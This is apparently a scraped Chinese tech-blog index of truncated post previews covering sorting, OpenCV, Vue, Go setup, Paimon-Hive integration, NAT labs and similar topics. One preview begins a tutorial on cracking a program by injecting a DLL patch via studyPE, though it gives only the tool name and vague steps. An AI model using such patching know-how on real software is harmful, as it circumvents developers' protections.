目录 1. 归并排序 1.1 递归实现 1.2 非递归实现 1.3 归并排序特性总结 2. 计数排序 代码实现 3. 总结 1. 归并排序 基本思想: 归并排序(merge sort)是建立在归并操作上的一种有效的排序算法,该算法是采用分治法࿰…...
【5】C#期末复习第5套
1.int a[3][2]{2,4,6,8,10.12};则*(a[1]1)的值是8 指向(a[1]的第二个元素) 再* 2.合并字符串库函数strcat 3.比较字符串库函数strcmp 4.执行结果是x3,y3 int x3,y; int *px&x; y*px; (优先级高于*) 5.*p[5]没…...
jquery虚拟键盘插件jqkeyboard
jqKeyboard是一款jquery虚拟键盘插件。该虚拟键盘插件依赖于jquery ui,通过该插件,可以在页面中生成一个扁平风格的虚拟键盘面板。 在线预览 下载 安装 可以通过npm来安装jqKeyboard虚拟键盘插件。 npm install jq keyboard --save 使用方法 在页面…...
的程序)
IMX6ULL开发板把屏幕刷黑(黑屏)的程序
承接博文 IMX6ULL开发板基础实验:Framebuffer驱动程序的简单应用实例代码详细分析 很容易写出把屏幕刷黑的程序… Ubuntu中的目录/home/book/mycode下新建目录C0003_draw_lcd_black,然后把把博文中的源码/home/book/mycode/C0002_show_pixel复制到目录C0003_draw_l…...
——图像轮廓)
OpenCV基本图像处理操作(三)——图像轮廓
轮廓 cv2.findContours(img,mode,method) mode:轮廓检索模式 RETR_EXTERNAL :只检索最外面的轮廓;RETR_LIST:检索所有的轮廓,并将其保存到一条链表当中;RETR_CCOMP:检索所有的轮廓,并将他们组…...
C语言学习day24:DLL给程序打上窗口破解补丁
简言 在上一章节我们知道了DLL,编写DLL以及最重要的导出DLL,这一章节我们学习如何给应用打上窗口破解补丁(DLL)。 流程 工具:studyPE 操作: 把要补丁的程序拖入PE中点击导入菜单,导入dll函…...
大模型呼出机器人的应用场景
大模型呼出机器人的应用场景 原作者:开源呼叫中心FreeIPCC,其Github:https://github.com/lihaiya/freeipcc 大模型呼出机器人的应用场景十分广泛,涵盖了多个行业和服务领域。以下是对其应用场景的详细归纳: 一、客户…...
el-date-picker筛选时间日期选择范围
el-date-picker 选择时间日期范围-> 昨天 近7天 30天<template><div class"main"><div class"header"><el-form :model"form" label-width"auto"><el-button plain click"setTimeToYesterday&q…...
【Apache Paimon】-- 10 -- Paimon 0.9.0 集成 Hive 3.1.3
参考官方 0.9.0 版本文档:https://paimon.apache.org/docs/0.9/engines/hive/ 1、下载依赖包到 hive lib 下 $ cd $HIVE_HOME/$ mkdir auxlib$ cd auxlib$ wget https://repo.maven.apache.org/maven2/org/apache/paimon/paimon-hive-connector-3.1/0.9.0/paimon-hive-connec…...
vue2如何写一个轮播图
需求描述 写一个轮播图,可以实现如下效果: 页面上展示三个轮播图元素默认状态下,进行自动轮播,循环播放一旦鼠标移入轮播图范围内,并停留在元素a上,则轮播图停止自动播放,同时将元素a放大 核…...
基础库httpx的使用
urllib 库和 requests 库的使用,已经可以爬取绝大多数网站的数据,但对于某些网站依然无能为力。什么情况?这些网站强制使用HTTP/2.0协议访问,这时 urllib 和requests 是无法爬取数据的,因为它们只支持 HTTP/1.1,不支持…...
MYSQL 利用concat函数 生成更新或者插入SQL
有时候需要批量运维一批数据,一条一条写SQL比较麻烦,可以使用下面的方法批量生成select sales_order_number,a.sog_line_id,actual_price,sales_goods_unit_price,b.id,concat(update your_table set actual_price, sales_goods_unit_price, where id,b…...
Backend For Frontend的学习分享
晚上公司开了一个技术分享会,主要内容就是公司的项目架构,会中讲解了项目整体架构是BFF架构,就是在微服务之上多加了一层。 除此之外,还讲解了DDD设计思想,主要用于各个业务中台,如订单中台、用户中台等。…...
KS曲线python实现
目录 实战 实战 # 导入第三方模块 import pandas as pd import numpy as np import matplotlib.pyplot as plt# 自定义绘制ks曲线的函数 def plot_ks(y_test, y_score, positive_flag):# 对y_test重新设置索引y_test.index np.arange(len(y_test))# 构建目标数据集target_dat…...
【GO环境安装】mac系统+GoLand使用
文章目录 下载安装包环境配置GoLandGo Modules 下载安装包 地址:GO下载地址 下载好后直接进行安装: 进入terminal,查看是否安装成功: 环境配置 在文稿下面创建工作目录: 在文稿下新建Go_Works文件夹,在…...
2025年入职/转行网络安全,该如何规划?网络安全职业规划
网络安全是一个日益增长的行业,对于打算进入或转行进入该领域的人来说,制定一个清晰且系统的职业规划非常重要。2025年,网络安全领域将继续发展并面临新的挑战,包括不断变化的技术、法规要求以及日益复杂的威胁环境。以下是一个关…...
linux中 umask 命令
Umask Umask(User File Creation Mode Mask)是Linux系统中的一项命令,用于设定新创建文件和目录的默认权限。 一、umask的作用 Umask通过掩码操作,限制新文件和目录的访问权限。在Linux中,所有的文件和目录都被分配…...
OpenCV函数及其应用
1. 梯度处理的Sobel算子函数 功能 Sobel算子是一种用于边缘检测的离散微分算子,它结合了高斯平滑和微分求导,用于计算图像亮度的空间梯度。 参数 src:输入图像。 dst:输出图像。 ddepth:输出图像的深度。 dxÿ…...
)
使用ENSP实现NAT(2)
一、NAT的类型 二、静态NAT 1.项目拓扑 2.项目实现 路由器AR1配置: 进入系统视图 sys将路由器命名为AR1 sysname AR1关闭信息中心 undo info-center enable 进入g0/0/0接口 int g0/0/0将g0/0/0接口IP地址配置为192.168.10.254/24 ip address 192.168.10.254 24进…...